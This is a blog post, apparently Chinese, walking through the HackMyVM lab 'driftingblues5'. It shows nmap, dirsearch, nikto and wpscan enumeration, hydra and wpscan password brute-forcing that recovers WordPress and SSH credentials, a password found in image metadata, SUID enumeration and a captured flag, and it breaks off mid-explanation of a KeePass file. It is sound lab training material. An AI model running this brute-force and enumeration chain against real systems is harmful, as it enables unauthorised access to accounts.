{"id":528,"date":"2024-04-11T15:56:17","date_gmt":"2024-04-11T07:56:17","guid":{"rendered":"http:\/\/162.14.82.114\/?p=528"},"modified":"2024-04-11T15:56:17","modified_gmt":"2024-04-11T07:56:17","slug":"hmv-_-driftingblues5","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/528\/04\/11\/2024\/","title":{"rendered":"hmv[-_-]driftingblues5"},"content":{"rendered":"<h1>driftingblues5<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555940.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555940.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411143032778\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV 172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)\n|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)\n|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.38 ((Debian))\n|_http-generator: WordPress 5.6.2\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: diary &amp;#8211; Just another WordPress site\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">sudo dirsearch -u http:\/\/172.20.10.4 -e* -i 200,300-399 2&gt;\/dev\/null <\/code><\/pre>\n<pre><code class=\"language-text\">  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/reports\/http_172.20.10.4\/_24-04-11_02-32-03.txt\n\nTarget: http:\/\/172.20.10.4\/\n[02:32:03] Starting: \n[02:32:22] 301 -    0B  - \/index.php  -&gt;  http:\/\/172.20.10.4\/\n[02:32:23] 200 -    7KB - \/license.txt\n[02:32:32] 200 -    3KB - \/readme.html\n[02:32:45] 301 -  313B  - \/wp-admin  -&gt;  http:\/\/172.20.10.4\/wp-admin\/\n[02:32:45] 200 -  512B  - \/wp-admin\/install.php\n[02:32:45] 302 -    0B  - \/wp-admin\/  -&gt;  http:\/\/172.20.10.4\/wp-login.php?redirect_to=http%3A%2F%2F172.20.10.4%2Fwp-admin%2F&amp;reauth=1\n[02:32:45] 200 -    0B  - \/wp-config.php\n[02:32:45] 301 -  315B  - \/wp-content  -&gt;  http:\/\/172.20.10.4\/wp-content\/\n[02:32:45] 200 -    0B  - \/wp-content\/\n[02:32:45] 200 -   84B  - \/wp-content\/plugins\/akismet\/akismet.php\n[02:32:45] 200 -  472B  - \/wp-content\/uploads\/\n[02:32:45] 301 -  316B  - \/wp-includes  -&gt;  http:\/\/172.20.10.4\/wp-includes\/\n[02:32:45] 200 -    0B  - \/wp-cron.php\n[02:32:45] 200 -    0B  - \/wp-includes\/rss-functions.php\n[02:32:45] 200 -    2KB - \/wp-login.php\n[02:32:45] 200 -    4KB - \/wp-includes\/\n[02:32:45] 302 -    0B  - \/wp-signup.php  -&gt;  http:\/\/172.20.10.4\/wp-login.php?action=register\n\nTask Completed<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.4\n+ Target Hostname:    172.20.10.4\n+ Target Port:        80\n+ Start Time:         2024-04-11 02:32:30 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.38 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: Drupal Link header found with value: &lt;http:\/\/172.20.10.4\/index.php\/wp-json\/&gt;; rel=&quot;https:\/\/api.w.org\/&quot;. See: https:\/\/www.drupal.org\/\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/index.php?: Uncommon header &#039;x-redirect-by&#039; found, with contents: WordPress.\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Apache\/2.4.38 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/wp-content\/plugins\/akismet\/readme.txt: The WordPress Akismet plugin &#039;Tested up to&#039; version usually matches the WordPress version.\n+ \/wp-links-opml.php: This WordPress script reveals the installed version.\n+ \/license.txt: License file found may identify site software.\n+ \/: A WordPress installation was found.\n+ \/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/wp-content\/uploads\/: Directory indexing found.\n+ \/wp-content\/uploads\/: WordPress uploads directory is browsable. This may reveal sensitive information.\n+ \/wp-login.php: WordPress login found.\n+ 8102 requests: 0 error(s) and 15 item(s) reported on remote host\n+ End Time:           2024-04-11 02:32:53 (GMT-4) (23 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h3>wpscan<\/h3>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/172.20.10.4\/ -e u --api-token=xxxx<\/code><\/pre>\n<pre><code class=\"language-css\">[i] User(s) Identified:\n\n[+] abuzerkomurcu\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n |  Rss Generator (Passive Detection)\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/172.20.10.4\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n[+] gill\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] collins\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] satanic\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] gadd\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)<\/code><\/pre>\n<p>\u5148\u4e0d\u7528\u6f0f\u6d1e\uff0c\u56e0\u4e3a\u673a\u5668\u6bd4\u8f83\u8001\u4e86\uff0c\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u4f5c\u8005\u60f3\u8981\u6211\u4eec\u4f7f\u7528\u6f0f\u6d1e\u3002<\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555942.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555942.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411143556863\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555943.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555943.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411143723207\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555944.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555944.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411143735848\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2aSPIP\u7248\u672c\u5c31\u662f\u6709\u6f0f\u6d1e\u7684\u3002\u3002\u3002<\/p>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.4\/readme.html<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555945.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555945.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411143853333\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">http:\/\/172.20.10.4\/wp-admin<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555946.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555946.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411143925060\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7206\u7834<\/h3>\n<p>\u5c1d\u8bd5\u4f7f\u7528rockyou\u548c\u7f51\u9875\u4e0a\u722c\u53d6\u751f\u6210\u7684\u5b57\u5178\u5bf9\u51e0\u4e2a\u7528\u6237\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;abuzerkomurcu\\ngill\\ncollins\\nsatanic\\ngadd&#039; &gt; user.txt<\/code><\/pre>\n<pre><code class=\"language-bash\">cewl http:\/\/172.20.10.4\/ -d 2 -m 6 -w pass.txt --with-numbers\n# -d 2 \u9012\u5f52\u4e24\u5c42\n# -m \u6700\u5c0f\u5bc6\u7801\u957f\u5ea6\n# --with-number \u5bc6\u7801\u53ef\u4ee5\u5e26\u6570\u5b57 <\/code><\/pre>\n<p><code>cewl<\/code>\u6bd4\u8f83\u9002\u5408\u505a\u56fd\u5916\u7684\u9776\u573a\uff0c\u7ed3\u679c\u6bd4\u8f83\u597d\uff0c\u7136\u540e\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ wpscan --url http:\/\/172.20.10.4 -U user.txt -P pass.txt\n\n[+] Performing password attack on Wp Login against 5 user\/s\n[SUCCESS] - gill \/ interchangeable                                                                                                                      \nTrying gadd \/ Author Time: 00:00:45 &lt;===============================================================               &gt; (4522 \/ 5460) 82.82%  ETA: ??:??:??<\/code><\/pre>\n<p>\u4e5f\u5c1d\u8bd5\u4e86ssh\u7206\u7834\uff0c\u4f46\u662f\u6ca1\u6709\uff0c\u4f30\u8ba1\u4e5f\u51fa\u4e0d\u4e86\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/172.20.10.4     \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 02:47:56\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 4690 login tries (l:5\/p:938), ~294 tries per task\n[DATA] attacking ssh:\/\/172.20.10.4:22\/\n[STATUS] 124.00 tries\/min, 124 tries in 00:01h, 4567 to do in 00:37h, 15 active\n[STATUS] 105.33 tries\/min, 316 tries in 00:03h, 4375 to do in 00:42h, 15 active\n^CThe session file .\/hydra.restore was written. Type &quot;hydra -R&quot; to resume session.<\/code><\/pre>\n<p>\u767b\u5f55\u4e0a\u53bb\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-apl\">gill\ninterchangeable<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555947.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555947.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411145313615\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u4eec\u770b\u6765\u4ed6\u51e0\u4e2ablog\u4f46\u662f\u6ca1\u5565\u53d1\u73b0\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555948.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555948.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411145722307\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e00\u5f20\u5947\u602a\u7684\u56fe\u7247\uff0c\u56fe\u6807\u662f\u672c\u9898\u6570\u636e\u5e93\u7684\u5b57\u6837\uff0c\u5c1d\u8bd5\u4e0b\u8f7d\u4e0b\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555949.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555949.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411145810033\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555950.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555950.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411145945914\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ exiftool dblogo.png \nExifTool Version Number         : 12.76\nFile Name                       : dblogo.png\nDirectory                       : .\nFile Size                       : 19 kB\nFile Modification Date\/Time     : 2021:02:24 09:46:01-05:00\nFile Access Date\/Time           : 2024:04:11 02:58:59-04:00\nFile Inode Change Date\/Time     : 2024:04:11 02:58:20-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PNG\nFile Type Extension             : png\nMIME Type                       : image\/png\nImage Width                     : 300\nImage Height                    : 300\nBit Depth                       : 8\nColor Type                      : RGB with Alpha\nCompression                     : Deflate\/Inflate\nFilter                          : Adaptive\nInterlace                       : Noninterlaced\nSRGB Rendering                  : Perceptual\nGamma                           : 2.2\nPixels Per Unit X               : 2835\nPixels Per Unit Y               : 2835\nPixel Units                     : meters\nXMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017\/07\/13-01:06:39\nCreator Tool                    : Adobe Photoshop CC 2018 (Windows)\nCreate Date                     : 2021:02:24 02:55:28+03:00\nMetadata Date                   : 2021:02:24 02:55:28+03:00\nModify Date                     : 2021:02:24 02:55:28+03:00\nInstance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405\nDocument ID                     : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b\nOriginal Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c\nColor Mode                      : RGB\nICC Profile Name                : sRGB IEC61966-2.1\nFormat                          : image\/png\nHistory Action                  : created, saved\nHistory Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405\nHistory When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00\nHistory Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)\nHistory Changed                 : \/\nText Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not\nText Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)\nDocument Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b\nImage Size                      : 300x300\nMegapixels                      : 0.090<\/code><\/pre>\n<p>\u53d1\u73b0\u4ed6\u5199\u7684<code>ssh<\/code>\u5bc6\u7801\u4e3a<code>59583hello<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ hydra -L user.txt -p 59583hello  ssh:\/\/172.20.10.4\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 03:01:35\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:5\/p:1), ~1 try per task\n[DATA] attacking ssh:\/\/172.20.10.4:22\/\n[22][ssh] host: 172.20.10.4   login: gill   password: 59583hello\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-11 03:01:48<\/code><\/pre>\n<pre><code class=\"language-apl\">gill\n59583hello<\/code><\/pre>\n<p>ssh\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555951.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555951.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411150327686\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/home\/gill$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n(remote) gill@driftingblues:\/home\/gill$ sudo -l\n-bash: sudo: command not found\n(remote) gill@driftingblues:\/home\/gill$ ls -la\ntotal 24\ndrwxr-xr-x 4 gill gill 4096 Apr 11 02:01 .\ndrwxr-xr-x 3 root root 4096 Feb 24  2021 ..\ndrwx------ 3 gill gill 4096 Apr 11 02:01 .gnupg\n-rwx------ 1 gill gill 2030 Feb 24  2021 keyfile.kdbx\ndrwx------ 2 gill gill 4096 Feb 24  2021 .ssh\n-r-x------ 1 gill gill   32 Feb 24  2021 user.txt\n(remote) gill@driftingblues:\/home\/gill$ cat user.txt \nF83FC7429857283616AE62F8B64143E6(remote) gill@driftingblues:\/home\/gill$ file keyfile.kdbx \nkeyfile.kdbx: Keepass password database 2.x KDBX<\/code><\/pre>\n<blockquote>\n<p><strong>Keepass Password Database 2.x KDBX<\/strong> \u662fKeePass\u5bc6\u7801\u7ba1\u7406\u5668\u7248\u672c2.x\u6240\u4f7f\u7528\u7684\u6570\u636e\u5e93\u6587\u4ef6\u683c\u5f0f\u3002KeePass\u662f\u4e00\u4e2a\u53ef\u4ee5\u5728\u591a\u4e2a\u64cd\u4f5c\u7cfb\u7edf\uff08\u5982Windows\u3001MAC\u3001Linux\u7b49\uff09\u4ee5\u53ca\u79fb\u52a8\u8bbe\u5907\u4e0a\u8fd0\u884c\u7684\u5bc6\u7801\u7ba1\u7406\u5668\u3002\u5b83\u4f7f\u7528\u9ad8\u5ea6\u52a0\u5bc6\u7684\u6570\u636e\u5e93\u6765\u5b58\u50a8\u53e3\u4ee4\uff0c\u8fd9\u4e9b\u53e3\u4ee4\u901a\u8fc7\u4e00\u4e2a\u4e3b\u5bc6\u94a5\u6587\u4ef6\u9501\u5b9a\u3002\u5373\u4f7f\u8001\u7248\u672c\u7684KeePass\u4f7f\u7528\u7684\u662fKDB\u6587\u4ef6\uff0c\u5b83\u4eec\u4ecd\u7136\u53ef\u4ee5\u7528\u6765\u6253\u5f00KDBX\u6587\u4ef6\u3002\u7b80\u800c\u8a00\u4e4b\uff0cKDBX\u6587\u4ef6\u662fKeePass\u7248\u672c2.x\u7684\u5bc6\u7801\u6570\u636e\u5e93\u6587\u4ef6\uff0c\u7528\u4e8e\u5b89\u5168\u5730\u5b58\u50